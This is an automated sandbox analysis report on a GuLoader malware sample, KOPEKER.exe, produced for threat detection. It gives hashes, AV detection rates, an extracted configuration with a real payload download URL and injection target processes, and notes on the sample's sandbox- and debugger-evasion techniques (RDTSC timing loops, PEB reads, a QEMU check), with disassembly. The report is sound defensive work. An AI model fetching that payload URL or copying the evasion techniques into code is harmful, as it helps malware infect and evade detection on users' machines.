Analysis Report KOPEKER.exe

Overview

General Information

Sample Name: KOPEKER.exe
Analysis ID: 392084
MD5: cd885321b35b73421cd63e3150d677f7
SHA1: 2f09e0eb93927d82076f34549b0d4d3b7b393aab
SHA256: 495edfb60c0a9af0c57251ce28ca0bcf4c911324f59074f99c2797e36c3f3ef4

Detection

GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Multi AV Scanner detection for submitted file
Yara detected GuLoader
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Found potential dummy code loops (likely to delay analysis)
Machine Learning detection for sample
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Abnormal high CPU Usage
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to read the PEB
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains an invalid checksum
PE file contains strange resources
Program does not show much activity (idle)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Startup

  • System is w10x64
  • KOPEKER.exe (PID: 5760 cmdline: 'C:\Users\user\Desktop\KOPEKER.exe' MD5: CD885321B35B73421CD63E3150D677F7)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=13mbmc5DER0_wKkBDGQL230MFPs1cTVbi", "Injection Process": ["RegAsm.exe", "RegSvcs.exe", "MSBuild.exe"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security |
Process Memory Space: KOPEKER.exe PID: 5760 | JoeSecurity_VB6DownloaderGeneric | Yara detected VB6 Downloader Generic | Joe Security |
Process Memory Space: KOPEKER.exe PID: 5760 | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security |

        Sigma Overview

        No Sigma rule has matched

        Signature Overview

        AV Detection:

        Found malware configuration
        Source: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=13mbmc5DER0_wKkBDGQL230MFPs1cTVbi", "Injection Process": ["RegAsm.exe", "RegSvcs.exe", "MSBuild.exe"]}
        Multi AV Scanner detection for submitted file
        Source: KOPEKER.exe, Virustotal: Detection: 62%
        Source: KOPEKER.exe, Metadefender: Detection: 32%
        Source: KOPEKER.exe, ReversingLabs: Detection: 82%
        Machine Learning detection for sample
        Source: KOPEKER.exe, Joe Sandbox ML: detected
        Source: KOPEKER.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

        Networking:

        C2 URLs / IPs found in malware configuration
        Source: Malware configuration extractor, URLs: https://drive.google.com/uc?export=download&id=13mbmc5DER0_wKkBDGQL230MFPs1cTVbi
        Source: C:\Users\user\Desktop\KOPEKER.exe, Process Stats: CPU usage > 98%
        Source: KOPEKER.exe, Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: KOPEKER.exe, 00000000.00000002.986561193.0000000002200000.00000002.00000001.sdmp, Binary or memory string: OriginalFilenameuser32j% vs KOPEKER.exe
        Source: KOPEKER.exe, 00000000.00000002.1003029734.00000000050D0000.00000002.00000001.sdmp, Binary or memory string: OriginalFilenameSHELL32.DLL.MUIj% vs KOPEKER.exe
        Source: classification engine, Classification label: mal100.troj.evad.winEXE@1/0@0/0
        Source: C:\Users\user\Desktop\KOPEKER.exe, File created: C:\Users\user\AppData\Local\Temp\~DF0ADD49C825BCA8F7.TMP
        Source: KOPEKER.exe, Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\KOPEKER.exe, Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
        Source: C:\Users\user\Desktop\KOPEKER.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

        Data Obfuscation:

        Yara detected GuLoader
        Source: Yara match, File source: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara match, File source: Process Memory Space: KOPEKER.exe PID: 5760, type: MEMORY
        Yara detected VB6 Downloader Generic
        Source: Yara match, File source: Process Memory Space: KOPEKER.exe PID: 5760, type: MEMORY
        Source: KOPEKER.exe, Static PE information: real checksum: 0x27f9e should be: 0x1d52b
        Source: C:\Users\user\Desktop\KOPEKER.exe, Code function: 0_2_00408053 push 8EA106DEh; ret 0_2_00408058
        Source: C:\Users\user\Desktop\KOPEKER.exe, Code function: 0_2_00405019 push FFFFFFF4h; retf 0_2_0040504C
        Source: C:\Users\user\Desktop\KOPEKER.exe, Code function: 0_2_0040C903 pushad ; ret 0_2_0040C938
        Source: C:\Users\user\Desktop\KOPEKER.exe, Code function: 0_2_0040C24B push 7600FFCEh; iretd 0_2_0040C250
        Source: C:\Users\user\Desktop\KOPEKER.exe, Code function: 0_2_0040445A push 0D010762h; retf 0_2_00404464
        Source: C:\Users\user\Desktop\KOPEKER.exe, Code function: 0_2_00402F28 push 713A1CACh; retf 0_2_00402F98
        Source: C:\Users\user\Desktop\KOPEKER.exe, Code function: 0_2_00403789 push BB150FDEh; retf 0_2_0040379C

        Hooking and other Techniques for Hiding and Protection:

        Icon mismatch, binary includes an icon from a different legit application in order to fool users
        Source: initial sample, Icon embedded in binary file: icon matches a legit application icon: download (71).png
        Source: C:\Users\user\Desktop\KOPEKER.exe, Process information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        Contains functionality to detect hardware virtualization (CPUID execution measurement)
        Detected RDTSC dummy instruction sequence (likely for instruction hammering)
        Source: C:\Users\user\Desktop\KOPEKER.exe, RDTSC instruction interceptor: First address: 000000000062607D second address: 000000000062607D instructions:
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
        Source: KOPEKER.exe, Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
        Tries to detect virtualization through RDTSC time measurements
        Source: C:\Users\user\Desktop\KOPEKER.exeRDTSC instruction interceptor: First address: 000000000040991D second address: 000000000040991D instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, 00000085h 0x00000008 cmp ebx, 00000000h 0x0000000b cmp ebx, 0000009Ch 0x00000011 cmp eax, 10h 0x00000014 cmp ebx, 27h 0x00000017 cmp ebx, 24h 0x0000001a cmp ebx, 00000092h 0x00000020 fsubr st(5), st(0) 0x00000022 fldz 0x00000024 packuswb mm6, mm5 0x00000027 fldz 0x00000029 fxch st(0), st(1) 0x0000002b faddp st(1), st(0) 0x0000002d fpatan 0x0000002f jmp 00007F44BC95AAFEh 0x00000031 cmp ebx, 63h 0x00000034 cmp ebx, 000000C6h 0x0000003a cmp eax, 000000A7h 0x0000003f cmp edi, 02EAFF40h 0x00000045 movd mm1, ebx 0x00000048 movd mm1, ebx 0x0000004b movd mm1, ebx 0x0000004e movd mm1, ebx 0x00000051 fst st(4) 0x00000053 pslld mm5, 15h 0x00000057 fabs 0x00000059 psrlw mm4, A7h 0x0000005d fnclex 0x0000005f punpckhwd xmm4, xmm1 0x00000063 psubusb mm5, mm1 0x00000066 jmp 00007F44BC95AAF9h 0x00000068 jne 00007F44BC95A8F8h 0x0000006e inc edi 0x0000006f cmp ebx, 000000C2h 0x00000075 cmp eax, 00000099h 0x0000007a cmp ebx, 5Dh 0x0000007d cmp eax, 00000096h 0x00000082 cmp eax, 68h 0x00000085 cmp eax, 40h 0x00000088 psraw xmm7, xmm3 0x0000008c paddb xmm4, xmm5 0x00000090 ffree st(3) 0x00000092 psraw mm4, mm6 0x00000095 fninit 0x00000097 punpcklbw mm6, mm1 0x0000009a psubw xmm0, xmm1 0x0000009e jmp 00007F44BC95AAFDh 0x000000a0 rdtsc
        Source: C:\Users\user\Desktop\KOPEKER.exeRDTSC instruction interceptor: First address: 0000000000626071 second address: 000000000062607D instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b pushad 0x0000000c rdtsc
        Source: C:\Users\user\Desktop\KOPEKER.exeRDTSC instruction interceptor: First address: 00000000006258C4 second address: 00000000006259C6 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov eax, dword ptr [ebp+04h] 0x0000000e jmp 00007F44BC95CB9Ah 0x00000010 cmp cl, dl 0x00000012 add eax, ebx 0x00000014 mov ecx, dword ptr [eax+18h] 0x00000017 jmp 00007F44BC95CB9Ah 0x00000019 cmp eax, 92C74976h 0x0000001e mov dword ptr [ebp+08h], ecx 0x00000021 mov ecx, dword ptr [eax+1Ch] 0x00000024 jmp 00007F44BC95CB9Ah 0x00000026 pushad 0x00000027 mov di, 847Ch 0x0000002b cmp di, 847Ch 0x00000030 jne 00007F44BC95C80Ch 0x00000036 popad 0x00000037 mov dword ptr [ebp+14h], ecx 0x0000003a mov ecx, dword ptr [eax+24h] 0x0000003d mov dword ptr [ebp+10h], ecx 0x00000040 jmp 00007F44BC95CB9Ah 0x00000042 cmp ecx, ecx 0x00000044 mov esi, dword ptr [eax+20h] 0x00000047 jmp 00007F44BC95CB9Ah 0x00000049 cmp ah, ch 0x0000004b add esi, dword ptr [ebp+04h] 0x0000004e xor ecx, ecx 0x00000050 jmp 00007F44BC95CB9Ah 0x00000052 cmp eax, edx 0x00000054 jmp 00007F44BC95CB9Ah 0x00000056 pushad 0x00000057 lfence 0x0000005a rdtsc
        Source: C:\Users\user\Desktop\KOPEKER.exeRDTSC instruction interceptor: First address: 00000000006257CD second address: 00000000006258C4 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b call 00007F44BC95AB2Bh 0x00000010 jmp 00007F44BC95AABAh 0x00000012 cmp ah, ch 0x00000014 mov dword ptr [ebp+04h], eax 0x00000017 jmp 00007F44BC95AABAh 0x00000019 cmp eax, edx 0x0000001b mov ebx, dword ptr [eax+3Ch] 0x0000001e add eax, ebx 0x00000020 mov ebx, dword ptr [eax+78h] 0x00000023 jmp 00007F44BC95AABAh 0x00000025 pushad 0x00000026 lfence 0x00000029 rdtsc
        Source: C:\Users\user\Desktop\KOPEKER.exe, Code function: 0_2_004096F2 rdtsc 0_2_004096F2
        Source: C:\Users\user\Desktop\KOPEKER.exe, Window / User API: threadDelayed 1256
        Source: C:\Users\user\Desktop\KOPEKER.exe, Window / User API: threadDelayed 8744
        Source: all processes, Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
        Source: KOPEKER.exe, Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

        Anti Debugging:

        Found potential dummy code loops (likely to delay analysis)
        Source: C:\Users\user\Desktop\KOPEKER.exe, Process Stats: CPU usage > 90% for more than 60s
        Source: C:\Users\user\Desktop\KOPEKER.exe, Code function: 0_2_004096F2 rdtsc 0_2_004096F2
        Source: C:\Users\user\Desktop\KOPEKER.exe, Code function: 0_2_006231CC mov eax, dword ptr fs:[00000030h] 0_2_006231CC
        Source: C:\Users\user\Desktop\KOPEKER.exe, Code function: 0_2_006222F6 mov eax, dword ptr fs:[00000030h] 0_2_006222F6
        Source: C:\Users\user\Desktop\KOPEKER.exe, Code function: 0_2_006222C7 mov eax, dword ptr fs:[00000030h] 0_2_006222C7
        Source: C:\Users\user\Desktop\KOPEKER.exe, Code function: 0_2_00622286 mov eax, dword ptr fs:[00000030h] 0_2_00622286
        Source: C:\Users\user\Desktop\KOPEKER.exe, Code function: 0_2_00622295 mov eax, dword ptr fs:[00000030h] 0_2_00622295
        Source: C:\Users\user\Desktop\KOPEKER.exe, Code function: 0_2_00625480 mov eax, dword ptr fs:[00000030h] 0_2_00625480
        Source: C:\Users\user\Desktop\KOPEKER.exe, Code function: 0_2_00626843 mov eax, dword ptr fs:[00000030h] 0_2_00626843
        Source: C:\Users\user\Desktop\KOPEKER.exe, Code function: 0_2_00626806 mov eax, dword ptr fs:[00000030h] 0_2_00626806
        Source: C:\Users\user\Desktop\KOPEKER.exe, Code function: 0_2_00626804 mov eax, dword ptr fs:[00000030h] 0_2_00626804
        Source: C:\Users\user\Desktop\KOPEKER.exe, Code function: 0_2_00621C82 mov eax, dword ptr fs:[00000030h] 0_2_00621C82
        Source: C:\Users\user\Desktop\KOPEKER.exe, Code function: 0_2_00625F2A mov eax, dword ptr fs:[00000030h] 0_2_00625F2A
        Source: all processes, Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
        Source: KOPEKER.exe, 00000000.00000002.986154636.0000000000D70000.00000002.00000001.sdmp, Binary or memory string: Shell_TrayWnd
        Source: KOPEKER.exe, 00000000.00000002.986154636.0000000000D70000.00000002.00000001.sdmp, Binary or memory string: Progman
        Source: KOPEKER.exe, 00000000.00000002.986154636.0000000000D70000.00000002.00000001.sdmp, Binary or memory string: &Program Manager
        Source: KOPEKER.exe, 00000000.00000002.986154636.0000000000D70000.00000002.00000001.sdmp, Binary or memory string: Progmanlock

        Mitre Att&ck Matrix

        Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
        Valid Accounts | Windows Management Instrumentation | Path Interception | Process Injection 1 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 511 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
        Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion 11 | LSASS Memory | Virtualization/Sandbox Evasion 11 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Application Layer Protocol 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
        Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection 1 | Security Account Manager | Process Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
        Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 1 | NTDS | Application Window Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
        Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | System Information Discovery 31 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        Source | Detection | Scanner | Label
        KOPEKER.exe | 62% | Virustotal |
        KOPEKER.exe | 38% | Metadefender |
        KOPEKER.exe | 83% | ReversingLabs | Win32.Trojan.VBObfuse
        KOPEKER.exe | 100% | Joe Sandbox ML |

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        No Antivirus matches

        Domains and IPs

        Contacted Domains

        No contacted domains info

        Contacted IPs

        No contacted IP infos

        General Information

        Joe Sandbox Version: 31.0.0 Emerald
        Analysis ID: 392084
        Start date: 19.04.2021
        Start time: 08:41:50
        Joe Sandbox Product: CloudBasic
        Overall analysis duration: 0h 8m 40s
        Hypervisor based Inspection enabled: false
        Report type: full
        Sample file name: KOPEKER.exe
        Cookbook file name: default.jbs
        Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
        Number of analysed new started processes analysed: 11
        Number of new started drivers analysed: 0
        Number of existing processes analysed: 0
        Number of existing drivers analysed: 0
        Number of injected processes analysed: 0
        Technologies:
        • HCA enabled
        • EGA enabled
        • HDC enabled
        • AMSI enabled
        Analysis Mode: default
        Analysis stop reason: Timeout
        Detection: MAL
        Classification: mal100.troj.evad.winEXE@1/0@0/0
        EGA Information:
        • Successful, ratio: 100%
        HDC Information:
        • Successful, ratio: 9.4% (good quality ratio 3.7%)
        • Quality average: 18.5%
        • Quality standard deviation: 24%
        HCA Information: Failed
        Cookbook Comments:
        • Adjust boot time
        • Enable AMSI
        • Found application associated with file extension: .exe
        Warnings:
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, MusNotifyIcon.exe, conhost.exe, svchost.exe

        Simulations

        Behavior and APIs

        No simulations

        Joe Sandbox View / Context

        IPs

        No context

        Domains

        No context

        ASN

        No context

        JA3 Fingerprints

        No context

        Dropped Files

        No context

        Created / dropped Files

        No created / dropped files found

        Static File Info

        General

        File type: PE32 executable (GUI) Intel 80386, for MS Windows
        Entropy (8bit): 5.7626204591873975
        TrID:
        • Win32 Executable (generic) a (10002005/4) 99.15%
        • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
        • Generic Win/DOS Executable (2004/3) 0.02%
        • DOS Executable Generic (2002/1) 0.02%
        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
        File name: KOPEKER.exe
        File size: 118784
        MD5: cd885321b35b73421cd63e3150d677f7
        SHA1: 2f09e0eb93927d82076f34549b0d4d3b7b393aab
        SHA256: 495edfb60c0a9af0c57251ce28ca0bcf4c911324f59074f99c2797e36c3f3ef4
        SHA512:cf8124f2fb91027365cb2ed941b121698a40e5992935bc0b3b6bdd15ad92a417ad62bf247b643132d886145dfcc6c3a48b3ee52aaa6fd8577e4b37457cd83c81
        SSDEEP:1536:q28031a0rd/d7dGBWBWevDWoiLUaYuWMm2IPKtopQYXQHoH5encrFQLn9MamuSHi:qiFa0BGBWYeaoNHKtG+JMi
        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#...B...B...B..L^...B...`...B...d...B..Rich.B..........PE..L......J.................p...`......h.............@................

        File Icon

        Icon Hash: c0c6f2e0e4fefe3f

        Static PE Info

        General

        Entrypoint: 0x401968
        Entrypoint Section: .text
        Digitally signed: false
        Imagebase: 0x400000
        Subsystem: windows gui
        Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
        DLL Characteristics:
        Time Stamp: 0x4A88EC80 [Mon Aug 17 05:37:04 2009 UTC]
        TLS Callbacks:
        CLR (.Net) Version:
        OS Version Major: 4
        OS Version Minor: 0
        File Version Major: 4
        File Version Minor: 0
        Subsystem Version Major: 4
        Subsystem Version Minor: 0
        Import Hash: 7677b40f5f8927412a58af017314f1ed

        Entrypoint Preview

        Instruction
        push 0040F4D8h
        call 00007F44BCECE623h
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        xor byte ptr [eax], al
        add byte ptr [eax], al
        inc eax
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [ebx-604C4D3Dh], dl
        cmp eax, 0B8E48E7h
        imul edi, dword ptr [esi+3Dh], 00FB3ECEh
        add byte ptr [eax], al
        add byte ptr [eax], al
        add byte ptr [ecx], al
        add byte ptr [eax], al
        add byte ptr [ecx+00h], al
        push es
        push eax
        xchg eax, ebx
        add ah, byte ptr [ecx+edi*2+72h]
        imul esi, dword ptr [edx+65h], 64h
        jnc 00007F44BCECE697h
        outsb
        add byte ptr [edx], ch
        int1
        add al, byte ptr [eax]
        add byte ptr [eax], al
        add bh, bh
        int3
        xor dword ptr [eax], eax
        or al, 1Ah
        wait
        xor al, 5Ch
        push edi
        mov bp, seg?
        inc eax
        nop
        xchg byte ptr [ebp-3Dh], bl
        dec edi
        loope 00007F44BCECE5DFh
        jl 00007F44BCECE61Fh
        xchg eax, edx
        and eax, dword ptr [edx]
        xor esp, eax
        dec esi
        lodsd
        push edx
        and ebx, dword ptr [edx]

        Data Directories

        Name | Virtual Address | Virtual Size | Is in Section
        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x17764 | 0x28 | .text
        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1a000 | 0x3822 | .rsrc
        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x228 | 0x20 |
        IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x1a8 | .text
        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

        Sections

        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
        .text | 0x1000 | 0x16d48 | 0x17000 | False | 0.439017917799 | data | 6.15247427314 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        .data | 0x18000 | 0x1260 | 0x1000 | False | 0.00634765625 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
        .rsrc | 0x1a000 | 0x3822 | 0x4000 | False | 0.4619140625 | data | 5.13551103483 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

        Resources

        Name | RVA | Size | Type | Language | Country
        RT_ICON | 0x1cf7a | 0x8a8 | data | |
        RT_ICON | 0x1c8b2 | 0x6c8 | data | |
        RT_ICON | 0x1c34a | 0x568 | GLS_BINARY_LSB_FIRST | |
        RT_ICON | 0x1b2a2 | 0x10a8 | data | |
        RT_ICON | 0x1a91a | 0x988 | data | |
        RT_ICON | 0x1a4b2 | 0x468 | GLS_BINARY_LSB_FIRST | |
        RT_GROUP_ICON | 0x1a458 | 0x5a | data | |
        RT_VERSION | 0x1a1e0 | 0x278 | data | English | United States

        Imports

        DLL | Import
        MSVBVM60.DLL | _CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaLenBstr, __vbaStrVarMove, __vbaFreeVarList, __vbaEnd, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, __vbaLenBstrB, _adj_fdiv_m32, __vbaAryDestruct, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, __vbaVarTstLt, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaStrCmp, __vbaObjVar, DllFunctionCall, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, _CIlog, __vbaNew2, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaLateMemCall, __vbaVarAdd, __vbaStrToAnsi, __vbaVarDup, __vbaFpI4, __vbaLateMemCallLd, _CIatan, __vbaStrMove, _allmul, __vbaLateIdSt, _CItan, __vbaFPInt, _CIexp, __vbaFreeStr, __vbaFreeObj

        Version Infos

        Description | Data
        Translation | 0x0409 0x04b0
        InternalName | KOPEKER
        FileVersion | 1.00
        CompanyName | Cluster-C
        Comments | Cluster-C
        ProductName | Cluster-C
        ProductVersion | 1.00
        FileDescription | Cluster-C
        OriginalFilename | KOPEKER.exe

        Possible Origin

        Language of compilation system | Country where language is spoken | Map
        English | United States

        Network Behavior

        No network behavior found

        Code Manipulations

        System Behavior

        General

        Start time: 08:42:44
        Start date: 19/04/2021
        Path: C:\Users\user\Desktop\KOPEKER.exe
        Wow64 process (32bit): true
        Commandline: 'C:\Users\user\Desktop\KOPEKER.exe'
        Imagebase: 0x400000
        File size: 118784 bytes
        MD5 hash: CD885321B35B73421CD63E3150D677F7
        Has elevated privileges: true
        Has administrator privileges: true
        Programmed in: Visual Basic
        Yara matches:
        • Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 00000000.00000002.985827741.0000000000620000.00000040.00000001.sdmp, Author: Joe Security
        Reputation: low

        Disassembly

        Code Analysis

          Execution Graph

          Execution Coverage: 1.4%
          Dynamic/Decrypted Code Coverage: 1.5%
          Signature Coverage: 0%
          Total number of Nodes: 132
          Total number of Limit Nodes: 28

          Graph


          Executed Functions

          Control-flow Graph

          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp Download File
          • Associated: 00000000.00000002.985397635.0000000000418000.00000004.00020000.sdmp Download File
          • Associated: 00000000.00000002.985413796.000000000041A000.00000002.00020000.sdmp Download File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_KOPEKER.jbxd
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          C-Code - Quality: 19%
          			E00409C39(void* __eax, void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi) {
          				void* _t21;
          				signed int _t22;
          				signed int _t23;
          				void* _t25;
          				intOrPtr* _t27;
          
          				_t27 = __edi;
          				_t25 = __ecx;
          				asm("aas");
          				_t21 = __eax - 0xfffffffd218f045d;
          				_t22 = _t21 + 0x302ae2;
          				asm("fst st4");
          				asm("pslld mm5, 0x15");
          				asm("fabs");
          				asm("psrlw mm4, 0xa7");
          				asm("fclex");
          				asm("punpckhwd xmm4, xmm1");
          				asm("psubusb mm5, mm1");
          				_t23 = _t22 ^ 0x002fa634;
          				asm("fdecstp");
          				asm("pxor xmm3, xmm3");
          				asm("punpcklwd mm2, mm6");
          				asm("pslld mm5, 0xd7");
          				asm("fchs");
          				asm("wait");
          				asm("punpckhdq xmm6, xmm5");
          				asm("paddd xmm0, xmm5");
          				asm("fdivr st6, st0");
          				 *_t23 =  *_t23 + _t23;
          				goto L5;
          				 *_t23 = _t23;
          				 *_t23 =  *_t23 + _t23;
          				 *_t27 =  *_t27 + _t25;
          				asm("psllw mm6, 0xca");
          			}









          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Uniqueness

          Uniqueness Score: -1.00%

          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Uniqueness

          Uniqueness Score: -1.00%

          APIs
          • VirtualAlloc.KERNELBASE(00000000,0000C000,00001000,00000040), ref: 0040AE00
          Uniqueness

          Uniqueness Score: -1.00%

          Memory Dump Source
          • Source File: 00000000.00000002.985332445.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.985319585.0000000000400000.00000002.00020000.sdmp
